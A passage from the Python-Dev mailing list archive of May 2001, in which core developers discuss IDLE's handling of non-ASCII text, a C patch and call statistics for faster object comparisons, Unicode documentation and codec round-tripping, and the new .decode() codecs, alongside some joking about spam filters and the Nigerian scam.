Raymond) Date: Mon, 14 May 2001 23:53:38 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: ; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400 References: Message-ID: <20010514235338.C663@thyrsus.com> Tim Peters : > Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through, along with a number of > intriguing promises that I can easily increase the size of my penis -- like I > have any need for either of those . What we should truly fear is the prospect that you might increase the size of your . -- Eric S. Raymond "The state calls its own violence `law', but that of the individual `crime'" -- Max Stirner From uche.ogbuji at fourthought.com Tue May 15 06:26:31 2001 From: uche.ogbuji at fourthought.com (Uche Ogbuji) Date: Mon, 14 May 2001 22:26:31 -0600 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message from "Tim Peters" of "Mon, 14 May 2001 23:50:00 EDT." Message-ID: <200105150426.f4F4QVx01531@localhost.local> > [Guido] > > Index: spam.c > > ... > > Congratulations! "My other" ISP (MSN) just started tagging suspected spam > with "spam" in the subject line, and my mail reader moves that to a special > spam folder upon delivery. So far this is the one and only incoming email > it's moved. Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through [...] I thought I was the only one getting all these silly Nigerian scam spams. I figured maybe they saw my name and decided to test on me (though they might more cleverly have figured that a fellow Nigerian would be wise to the game). However, with the (sloppily) bogus headers I've always found on those things, I'm surprised your ISP couldn't sniff them out. Not that it matters. The Eastern Nigerian proverb gets it right.
"Once hunters learn to shoot without missing, birds will learn to fly without resting". -- Uche Ogbuji Principal Consultant uche.ogbuji at fourthought.com +1 303 583 9900 x 101 Fourthought, Inc. http://Fourthought.com 4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Tue May 15 08:28:34 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 02:28:34 -0400 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> Message-ID: [Guido] > Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? [Martin] > Perhaps the Tcl version? That sounds like the issue that Marc talked > about: Tk behaves differently when text is entered programmatically > (and perhaps through cut-n-paste), as compared to text entered through > the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on > Solaris 8 still gives me the UnicodeError. I don't know which version of Python Guido used. I tried cut-&-paste of s='äö' from his email into the distributed 2.1 IDLE under Win98, and got UnicodeError: ASCII encoding error: ordinal not in range(128) Tk appears to interfere with using the usual Windows ALT+0nnn method of entering funny characters, so unsure what happens then -- but for me it either works fine or does something insane (moves the cursor to the left margin, brings up an IDLE dialog box, etc). If I open the system Character Map utility and copy-&-paste using *that*, I can enter all sorts of stuff without problem: >>> s = "àáâãäåæçèéêëìíîïðñòòóôõö÷øùúûüýþÿ" >>> s '\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' >>> So not all clipboard entries are created equal. Another clue: if I paste the s='äö'
snippet from Guido's email into a file opened with Notepad, then immediately copy it again from the Notepad doc, then paste that into Idle, again no problem: >>> s='äö' >>> s '\xe4\xf6' >>> Using a clipboard diagnostic tool I don't understand, when I copy from Notepad these data formats are in the system clipboard: TEXT LOCALE OEMTEXT But when I copy from Guido's email under Outlook 2000, it's DataObject Rich Text Format Rich Text Format Without Objects RTF as Text TEXT UNICODTEXT Ole Private Data LOCALE OEMTEXT Under Character Map, it's Rich Text Format TEXT LOCALE OEMTEXT So perhaps it's not the version of Tk but the source of the data, and that Tk grabs an unfortunate data format (when present) from the clipboard in preference to a fortunate one. the-clipboard-is-a-complex-beast-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Tue May 15 08:44:23 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 08:44:23 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> > Applying that to the above leaves you with nothing but > > if (v == w && op == Py_EQ) /* then return Py_True */ > > [...] So I don't see much future in that. Is this really exactly what Python would guarantee? I'm surprised that x==x would always be true, but x!=x might be true also. In a type where x!=x holds, wouldn't people also want to say that x==x might fail? IOW, I had expected that you'd reduced it to if (v == w && op == Py_EQ) /* then return Py_True */ if (v == w && op == Py_NE) /* then return Py_False */ The one application where this may help is list_contains, in particular when searching a list of interned strings. > You got an 8% speedup for one type by tricking the switch stmt into > appearing 3 calls earlier. What if the implementation were smarter, > and did it for *all* relevant types even a call or two before that? Please have a look at the patch below.
Since I made a CVS update since yesterday, I had to readjust the baseline results: 0.790 0.780 0.770 0.780 0.780 0.790 0.780 0.790 0.790 0.790 The patch moves the case "equal types, supporting cmp" to somewhat earlier, just after the attempt to do richcompare. Now I get 0.760 0.770 0.750 0.770 0.750 0.750 0.760 0.760 0.760 0.760 So while there is some saving, this is not as good as implementing richcompare. > I don't see any reason "in principle" that compares couldn't be much > faster, and via the usual gimmicks: bigger, smarter functions that > remember what they've already determined so don't need to figure it > out over and over again, and fast paths to favor common cases at the > expense of comparisons from Mars. I agree "in principle" :-) However, you cannot move the case "equal types, implementing tp_compare" before the case "one of them implements tp_richcompare" without changing the semantics. The change here is what you'd do when you have both richcmp and oldcomp; Python clearly mandates using richcmp. In case this is not obvious (it wasn't to me): UserList will complain about using the deprecated __cmp__, and dictionaries will iterate over their elements differently. Given that richcomp has to be tried first, this patch does the "common case" at the earliest possible time, and with no overhead, except for PyErr_Occurred call. So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT TP_RICHCOMPARE (sorry for shouting). If you think the extra work for type implementors is not acceptable, we can offer a convenience function that everybody implementing tp_compare can put into tp_richcompare. For strings, I would still special-case tp_richcompare: when tracing calls to string_richcompare, I found that most calls with Py_EQ can be decided by checking that the string lengths are not equal. This is all "bigger, faster functions" put to work. 
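Martin's string special case, which his earlier string_richcompare patch implements, can be sketched in Python. For `==`, a length mismatch settles the answer without examining any characters. Only otherwise does the code fall back to a full three-way compare and the generic mapping. This is an illustrative model with hypothetical names, not CPython code. The C patch also short-circuits `==` when both strings already have cached, differing hashes, and plain Python cannot observe that cache without computing the hash.

```python
import operator

_RICH = {"lt": operator.lt, "le": operator.le, "eq": operator.eq,
         "ne": operator.ne, "gt": operator.gt, "ge": operator.ge}

def string_compare(a: str, b: str) -> int:
    """Stand-in for the C string_compare: negative, zero or positive."""
    return (a > b) - (a < b)

def string_richcompare(a: str, b: object, op: str):
    """Model of the patched slot: EQ fast path first, generic mapping after."""
    if not isinstance(b, str):
        return NotImplemented            # let the other operand's slot try
    if op == "eq" and len(a) != len(b):
        return False                     # different lengths can never be equal
    if op not in _RICH:
        return NotImplemented            # mirrors the C 'default:' branch
    return _RICH[op](string_compare(a, b), 0)
```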
Regards, Martin Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -u -r2.131 object.c --- object.c 2001/05/11 03:36:45 2.131 +++ object.c 2001/05/15 06:16:53 @@ -477,16 +477,6 @@ if (PyInstance_Check(w)) return (*w->ob_type->tp_compare)(v, w); - /* If the types are equal, don't bother with coercions etc. */ - if (v->ob_type == w->ob_type) { - if ((f = v->ob_type->tp_compare) == NULL) - return 2; - c = (*f)(v, w); - if (PyErr_Occurred()) - return -2; - return c < 0 ? -1 : c > 0 ? 1 : 0; - } - /* Try coercion; if it fails, give up */ c = PyNumber_CoerceEx(&v, &w); if (c < 0) @@ -590,15 +580,21 @@ -1 if v < w; 0 if v == w; 1 if v > w; + If the object implements a tp_compare function, it returns + whatever this function returns (whether with an exception or not). */ static int do_cmp(PyObject *v, PyObject *w) { int c; + cmpfunc f; c = try_rich_to_3way_compare(v, w); if (c < 2) return c; + if (v->ob_type == w->ob_type + && (f = v->ob_type->tp_compare) != NULL) + return (*f)(v, w); c = try_3way_compare(v, w); if (c < 2) return c; @@ -760,16 +756,9 @@ } static PyObject * -try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +convert_3way_to_object(int op, int c) { - int c; PyObject *result; - - c = try_3way_compare(v, w); - if (c >= 2) - c = default_3way_compare(v, w); - if (c <= -2) - return NULL; switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; @@ -782,16 +771,46 @@ Py_INCREF(result); return result; } + static PyObject * +try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +{ + int c; + + c = try_3way_compare(v, w); + if (c >= 2) + c = default_3way_compare(v, w); + if (c <= -2) + return NULL; + return convert_3way_to_object(op, c); +} + +static PyObject * do_richcmp(PyObject *v, PyObject *w, int op) { PyObject *res; + cmpfunc f; + res = try_rich_compare(v, w, op); if (res != Py_NotImplemented) return res; 
Py_DECREF(res); + + /* If the types are equal, don't bother with coercions etc. + Instances are special-cased in try_3way_compare, since + a result of 2 does *not* mean one value being greater + than the other. */ + if (v->ob_type == w->ob_type + && !PyInstance_Check(v) + && (f = v->ob_type->tp_compare) != NULL) { + int c; + c = (*f)(v, w); + if (PyErr_Occurred()) + return NULL; + return convert_3way_to_object(op, c); + } return try_3way_to_rich_compare(v, w, op); } From tim.one at home.com Tue May 15 09:33:06 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:33:06 -0400 Subject: [Python-Dev] Unicode docs In-Reply-To: <3AFFA23F.248517E3@lemburg.com> Message-ID: I don't know that the Unicode docs need massive work, but the docs that are there simply don't answer the technical questions people have: they're too thin. Let's keep it simple. Contrast the Library manual's: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. Error handling is done according to errors. The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. See also the codecs module. with Andrew's description (from http://www.amk.ca/python/2.0/): unicode(string [, encoding] [, errors]) Creates a Unicode string from an 8-bit string. encoding is a string naming the encoding to use. The errors parameter specifies the treatment of characters that are invalid for the current encoding; passing 'strict' as the value causes an exception to be raised on any encoding error, while 'ignore' causes errors to be silently ignored and 'replace' uses U+FFFD, the official replacement character, in case of any problems. The latter addresses several *fundamental* questions untouched by the former, like what are the datatypes of the arguments and the result, what values does errors accept, and what do they mean? The first blurb answers some more, like what's the default encoding, and which exception is raised?
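The questions both descriptions try to answer can be shown concretely. Current Python 3 no longer has the `unicode()` builtin; `str(bytes, encoding, errors)` plays the same role. The sketch decodes a byte string that is valid Latin-1 but invalid UTF-8 under each of the three error modes Andrew lists, then does a round trip. The helper name `decode_modes` is illustrative only.

```python
def decode_modes(raw: bytes, encoding: str = "utf-8") -> dict:
    """Decode `raw` under each error mode; a failure is returned, not raised."""
    results = {}
    for mode in ("strict", "ignore", "replace"):
        try:
            results[mode] = str(raw, encoding, mode)
        except UnicodeDecodeError as exc:   # a subclass of ValueError
            results[mode] = exc
    return results

raw = b"caf\xe9"                      # Latin-1 bytes for "café"; invalid UTF-8
for mode, value in decode_modes(raw).items():
    print(mode, repr(value))

# Round trip: decoding with the encoding that produced the bytes is lossless.
text = str(raw, "latin-1")
assert text == "café" and text.encode("latin-1") == raw
```

Here 'strict' yields the exception, 'ignore' drops the bad byte, and 'replace' substitutes U+FFFD.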
Neither is complete on its own, but the reference manual should have a complete answer to all such questions. It doesn't have to go on at great length. A round-trip example would be invaluable. If Fred wanted to incorporate a brief overview too, a light rework of Andrew/Moshe's writeup would be an excellent start. From tim.one at home.com Tue May 15 09:47:16 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 03:47:16 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com> Message-ID: [M.-A. Lemburg] > The problem is: which part would raise the exception -- the > encoder or the decoder ? Since I don't yet use any of this stuff for real, I have no idea: seems mostly a question of pragmatics, and I don't have any feel for how cp875 users would view it. > Here are some more options: > > * sort the items before creating the encoding table from the > decoding one (makes the mapping stable) If users don't care that round-trip can fail silently, fine. > * map keys which have multiple mappings in the encoding table > to None -- this causes their usage to raise an exception > (undefined mapping) If users don't care that they'll get an exception when they try something that can't be round-tripped, fine. Or would this depend on the value of the "errors" argument too? Then it's easier to impose. There's a theme here : I have no idea how important roundtrip is in Unicode Practice, or even that it's a constant across apps and encodings. If I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I wouldn't care that I can't get "love" back from u"kaka" . From mal at lemburg.com Tue May 15 10:19:06 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Tue, 15 May 2001 10:19:06 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3B00E67A.C5769082@lemburg.com> Tim Peters wrote: > > I don't know that the Unicode docs need massive work, but the docs that are > there simply don't answer the technical questions people have: they're too > thin. As much as I would like to work on this, I simply don't have the time... if someone wants to contribute more detailed docs, though, I'd be glad to review them and answer remaining questions. Note that I will give a talk at the upcoming Bordeaux conference about Python and Unicode. The slides will eventually go online after the conference (in July). BTW, are any python-devs attending the conference (they have some great wine in that part of France ;-) ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 15 10:32:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:32:14 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B00E98E.1C44FF5@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > The problem is: which part would raise the exception -- the > > encoder or the decoder ? > > Since I don't yet use any of this stuff for real, I have no idea: seems > mostly a question of pragmatics, and I don't have any feel for how cp875 > users would view it. If there are any... that code page dates back to 1996 and is based in the EBCDIC world. > > Here are some more options: > > > > * sort the items before creating the encoding table from the > > decoding one (makes the mapping stable) > > If users don't care that round-trip can fail silently, fine. 
> > > * map keys which have multiple mappings in the encoding table > > to None -- this causes their usage to raise an exception > > (undefined mapping) > > If users don't care that they'll get an exception when they try something > that can't be round-tripped, fine. Or would this depend on the value of the > "errors" argument too? Then it's easier to impose. The errors argument tells the codecs what to do in case a mapping fails (from codecs.py): The .encode()/.decode() methods may implement different error handling schemes by providing the errors argument. These string values are defined: 'strict' - raise a ValueError error (or a subclass) 'ignore' - ignore the character and continue with the next 'replace' - replace with a suitable replacement character; Python will use the official U+FFFD REPLACEMENT CHARACTER for the builtin Unicode codecs. 'strict' is the default for all operations that deal with auto- conversion. 'ignore' and 'replace' allow silently ignoring the problem. > There's a theme here : I have no idea how important roundtrip is in > Unicode Practice, or even that it's a constant across apps and encodings. If > I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I > wouldn't care that I can't get "love" back from u"kaka" . Round-tripping is obviously very important if you use Unicode as basis for working on text. I don't know about the reasoning behind making cp875 fail the round-trip -- Unicode certainly provides means to make mappings round-trip safe (e.g. by reverting to the private Unicode char. point areas). 
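Tim asks for a round-trip example, and the errors modes listed above are easiest to see in one. A minimal sketch, assuming modern Python 3 rather than the 2001 `unicode()` builtin: today `bytes.decode()` and `str.encode()` take the same `encoding` and `errors` arguments, and the strict failure is a `UnicodeDecodeError`, which is a subclass of `ValueError`. Latin-1 and ASCII are used instead of cp875 only because their behavior is easy to predict.

```python
# Round-trip and error-handling sketch using Python 3's bytes/str codec API.
raw = "abc\u00e4\u00f6\u00fc".encode("latin-1")   # b'abc\xe4\xf6\xfc'

# Latin-1 maps each byte 0x00-0xFF to U+0000-U+00FF, so decoding and
# re-encoding gives back exactly the same bytes.
text = raw.decode("latin-1")
assert text.encode("latin-1") == raw

# ASCII has no mapping for bytes >= 0x80; the errors argument decides what happens.
strict_error = None
try:
    raw.decode("ascii")                   # errors="strict" is the default
except UnicodeDecodeError as exc:         # UnicodeDecodeError subclasses ValueError
    strict_error = exc

ignored = raw.decode("ascii", errors="ignore")    # undecodable bytes are dropped
replaced = raw.decode("ascii", errors="replace")  # each one becomes U+FFFD

print(type(strict_error).__name__)  # UnicodeDecodeError
print(ignored)                      # abc
print(ascii(replaced))              # 'abc\ufffd\ufffd\ufffd'
```

Note that only the strict run preserves the information needed for a round trip; 'ignore' and 'replace' trade it away for not raising.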
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Tue May 15 11:26:32 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 15 May 2001 05:26:32 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > Is this really exactly what Python would guarantee? I'm surprised that > x==x would always be true, but x!=x might be true also. In a type where > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > I had expected that you'd reduced it to > > if (v == w && op == Py_EQ) /* then return Py_True */ > if (v == w && op == Py_NE) /* then return Py_False */ I agree that would be more analogous to what PyObject_Compare() does. I'm not sure either make sense for rich comparisons; for example, under IEEE-754 rules, a NaN must compare not-equal to everything, including itself(!), and richcmps are the only hope Python users have of modeling that. Doing those pointer checks before giving richcmps a chance would kill that hope. Can we agree to drop this one until somebody produces stats saying it's important? I have no reason to suspect that it is. > The one application where this may help is list_contains, in > particular when searching a list of interned strings. string_compare() could special-case pointer equality too, although I suspect doing so would be a net loss. > Please have a look at the patch below. I will, but not tonight anymore -- it's been a very long day. > ... > I agree "in principle" :-) However, you cannot move the case "equal > types, implementing tp_compare" before the case "one of them > implements tp_richcompare" without changing the semantics. Of course. But except for instance objects, answering "does the type implement tp_richcompare?" 
is one lousy pointer check, and the answer will usually be-- provided we don't start stuffing code into *every* object's tp_richcompare slot! --"no, so I can go to tp_compare immediately". Coercions and richcmps are the oddball cases today. > The change here is what you'd do when you have both richcmp and > oldcomp; Python clearly mandates using richcmp. Yes, except you don't usually have both today and reality is exploitable . > In case this is not obvious (it wasn't to me): UserList will complain > about using the deprecated __cmp__, Sounds like a bug to me; if cmp is deprecated, that's also news to me. > and dictionaries will iterate over their elements differently. dicts didn't have a tp_richcompare slot before I added it last week, and because dicts can do a much faster and more-general job on Py_EQ and Py_NE than dict cmp (but on nothing else). I originally took away the tp_compare slot for dicts and lived to regret it -- it has both now. > Given that richcomp has to be tried first, this patch does the "common > case" at the earliest possible time, and with no overhead, except for > PyErr_Occurred call. The earliest *reasonable* time would be after a short block of new pointer checks while still inside PyObject_RichCompare(): I believe the usual case today is that the objects are of the same type, the type doesn't have a tp_richcompare slot, but does have a tp_compare slot. This covers at least ints, floats, longs and strings, where the overhead of a single function call is most often larger than the time it actually takes to compare the darned things. It's not important to, e.g., get to a dict comparison quickly, because comparing dicts is darned expensive even after we find the dict comparison routine. Ditto comparing instances or matrices etc. Optimizing for richcmps is optimizing the less important thing. BTW, tuples have a richcompare slot today and it's unclear that's a good idea. 
They do the same kind of Py_EQ/Py_NE "length check" you like for strings, and I'd be surprised if that didn't cost more than it saves. Unlike strings, whenever I compare tuples they *always* have the same size (e.g., think of all the decorator pattern ways tuples are used to augment sorts). OK, across a full run of the test suite, tuplerichcompare() was called about 162000 times, all but about 50 times with Py_EQ or Py_NE. The number of times this code block at the start bore fruit: if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) { /* Shortcut: if the lengths differ, the tuples differ */ PyObject *res; if (op == Py_EQ) res = Py_False; else res = Py_True; Py_INCREF(res); return res; } was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code just burned cycles. I want to move toward optimizations that save more than they cost <0.7 wink>. > ... > For strings, I would still special-case tp_richcompare: when tracing > calls to string_richcompare, I found that most calls with Py_EQ can > be decided by checking that the string lengths are not equal. I expect you'd also find that the current string_compare() usually decides they're not equal on the first character comparison (which *it* special-cases). So special-casing on length isn't a clear win over what's already done. But, if it is, bravo! Special-case the snot out of it without calling *any* string functions (merely calling string_richcompare likely costs a good deal more than comparing the lengths). 
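The dispatch order under discussion (try the rich comparison first, then fall back to an old-style three-way result mapped onto the requested operator, as `convert_3way_to_object` does in Martin's patch) can be modelled in a few lines. This is a sketch only: `rich_compare`, `convert_3way`, `OPS` and the `rich`/`cmp3` hooks are hypothetical names, not CPython APIs, and Python's `NotImplemented` stands in for `Py_NotImplemented`.

```python
# Hypothetical model of rich comparison with a three-way fallback.
# Each operator becomes a test on a three-way result c (<0, 0 or >0),
# mirroring the switch in convert_3way_to_object.
OPS = {
    "<": lambda c: c < 0,
    "<=": lambda c: c <= 0,
    "==": lambda c: c == 0,
    "!=": lambda c: c != 0,
    ">": lambda c: c > 0,
    ">=": lambda c: c >= 0,
}


def convert_3way(op, c):
    """Turn a three-way compare result into a bool for operator op."""
    return OPS[op](c)


def rich_compare(v, w, op, rich=None, cmp3=None):
    """Try the rich hook first; fall back to the three-way hook."""
    if rich is not None:
        res = rich(v, w, op)
        if res is not NotImplemented:
            return res
    if cmp3 is not None:
        return convert_3way(op, cmp3(v, w))
    raise TypeError("no comparison defined for %r %s %r" % (v, op, w))


def int_cmp(a, b):
    """Classic three-way compare returning -1, 0 or 1."""
    return (a > b) - (a < b)


print(rich_compare(3, 5, "<", cmp3=int_cmp))   # True
print(rich_compare(5, 5, "!=", cmp3=int_cmp))  # False
```

In this model, the fast path Tim proposes corresponds to jumping straight to the `cmp3` branch when both operands share a type that has no rich hook, skipping the extra call and `NotImplemented` check.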
more-measuring-less-guessing-ly y'rs - tim From thomas at xs4all.net Tue May 15 13:51:06 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 15 May 2001 13:51:06 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600 References: <200105150426.f4F4QVx01531@localhost.local> Message-ID: <20010515135106.A16811@xs4all.nl> On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote: > I thought I was th only one getting all these silly Nigerian scam spams. I > figured maybe they saw my name and decided to test on me (though they might > more cleverly have figured that a fellow Nigerian would be wise to the game). Actually, one of my colleagues informed me that this spam is in fact *very old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the Nigerian spam a mere week after getting the spam myself :) Scott (my colleague, not Adams) remembers first getting it by fax, 15 years ago, and again several years later. And not just one fax, but every single fax in the company, and lots more outside of the company. Apparently the telephone operator issued a warning to all customers not to respond to the fax. Still-sound-advice-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Tue May 15 14:10:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 14:10:16 +0200 Subject: [Python-Dev] Easy codec access Message-ID: <3B011CA8.9DDB4FC7@lemburg.com> I've just checked in a set of patches which implement the new .decode() method along with a couple of useful codecs. 
You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'
>>> "abcäöü".decode('latin-1')
u'abc\xe4\xf6\xfc'
>>> "abcäöü".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'
>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one now. To see just how easy it is to write codecs, please have a look at the string codecs I added in this patch (e.g. zlib_codec.py or hex_codec.py). I am pretty sure that there are a lot more useful things in the standard lib which could benefit from these easy-to-use interfaces. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at pythonware.com Tue May 15 14:11:26 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Tue, 15 May 2001 14:11:26 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 References: <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl> Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff> thomas wrote: > Actually, one of my colleagues informed me that this spam is in fact > *very old* more info here: http://home.rica.net/alphae/419coal/index.htm "A Five Billion US$ (as of 1996, much more now) worldwide Scam which has run since the early 1980's under Successive Governments of Nigeria. "The Nigerian Scam is, according to published reports, the Third to Fifth largest industry in Nigeria." Cheers /F (highest offer this far: $155,000,000) From guido at digicool.com Tue May 15 17:27:31 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 10:27:31 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
References: Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com> > [Martin v. Loewis] > > Is this really exactly what Python would guarantee? I'm surprised that > > x==x would always be true, but x!=x might be true also. In a type where > > x!=x holds, wouldn't people also want to say that x==x might fail? IOW, > > I had expected that you'd reduced it to > > > > if (v == w && op == Py_EQ) /* then return Py_True */ > > if (v == w && op == Py_NE) /* then return Py_False */ [Tim] > I agree that would be more analogous to what PyObject_Compare() does. > > I'm not sure either make sense for rich comparisons; for example, under > IEEE-754 rules, a NaN must compare not-equal to everything, including > itself(!), and richcmps are the only hope Python users have of modeling that. > Doing those pointer checks before giving richcmps a chance would kill that > hope. Can we agree to drop this one until somebody produces stats saying > it's important? I have no reason to suspect that it is. PEP 207 is quite explicit that == and != are not to be assumed each other's complement. It is silent on the x==x issue but the PEP mentions IEEE 754 so I agree that this also shouldn't be cut short. --Guido van Rossum (home page: http://www.python.org/~guido/) From fdrake at acm.org Tue May 15 17:29:10 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 15 May 2001 11:29:10 -0400 (EDT) Subject: [Python-Dev] Unicode docs In-Reply-To: References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com> Tim Peters writes: > The latter addresses several *fundamental* questions untouched by > the former, like whar are the datatypes of the arguments and the > result, what values does errors accept, and what do they mean? The > first blurb answers some more, like what's the default encoding, > and which exception is raised? 
Neither is complete on its own, but > the reference manual should have a complete answer to all such > questions. It doesn't have to go on at great length. I've beefed up the description of the unicode() function by merging the information from AMK's document. > A round-trip example would be invaluable. > > If Fred wanted to incorporate a brief overview too, a light rework of > Andrew/Moshe's writeup would be an excellent start. I'd love to have a contribution from someone with more knowledge of what's there than me. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Tue May 15 18:35:09 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 15 May 2001 11:35:09 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200." <3B011CA8.9DDB4FC7@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com> > I've just checked in a set of patches which implement the new > .decode() method along with a couple of useful codecs. Cool! > To see just how easy it is to write codecs, please have > a look at the string codecs I added in this patch (e.g. > zlib_codec.py or hex_codec.py). I am pretty sure that there > are a lot more useful things in the standard lib which could > benefit from these easy-to-use interfaces. As an exercise, I added a quoted-printable codec. It was easy indeed! --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Tue May 15 20:21:00 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Tue, 15 May 2001 20:21:00 +0200 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid> in case anyone has two hours to spare, and the right software, MIT's dynamic languages group has posted a quicktime video of their recent panel on language design.
http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html (what 1/2 should result in, why it's good to have both CPython and JPython, why whitespace is significant, why language design is perhaps more related to architecture than math, and lots of other goodies from Guy Steele and others) Cheers /F From nas at python.ca Tue May 15 20:51:20 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 15 May 2001 11:51:20 -0700 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200 References: <000901c0dd6b$cdb5d960$e46940d5@hagrid> Message-ID: <20010515115120.A14357@glacier.fnational.com> Fredrik Lundh wrote: > in case anyone has two hours to spare, and the right software, > MIT's dynamic languages group has posted a quicktime video of > their recent panel on language design. > > http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html Does the streaming actually work for anyone? I've given up and started downloading the whole .mov files. Neil From martin at loewis.home.cs.tu-berlin.de Tue May 15 21:45:59 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 21:45:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de> > more-measuring-less-guessing-ly y'rs - tim Producing numbers is easy :-) I've instrumented my version where string implements richcmp, and special-cases everything I can think of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare: 2378660
Calls with different types: 33992 (i.e. one is not a string)
Calls with identical strings: 120517
Calls where lens decide !EQ: 1775716
----------------------------
Calls richcmp -> oldcomp: 448435
Total calls to oldcomp: 1225643
Calls oldcomp -> memcmp: 860174

So 5% of the calls are with identical strings, for which I can immediately decide the outcome. 75% can be decided in terms of the string lengths, which leaves ca. 19% for cases where lexicographical comparison is needed. In those cases, the first byte decides in 30%. If I remove the test for "len decides !EQ", I get

#riches: 2358322
#riches_ni: 34108
#idents_decide: 102050
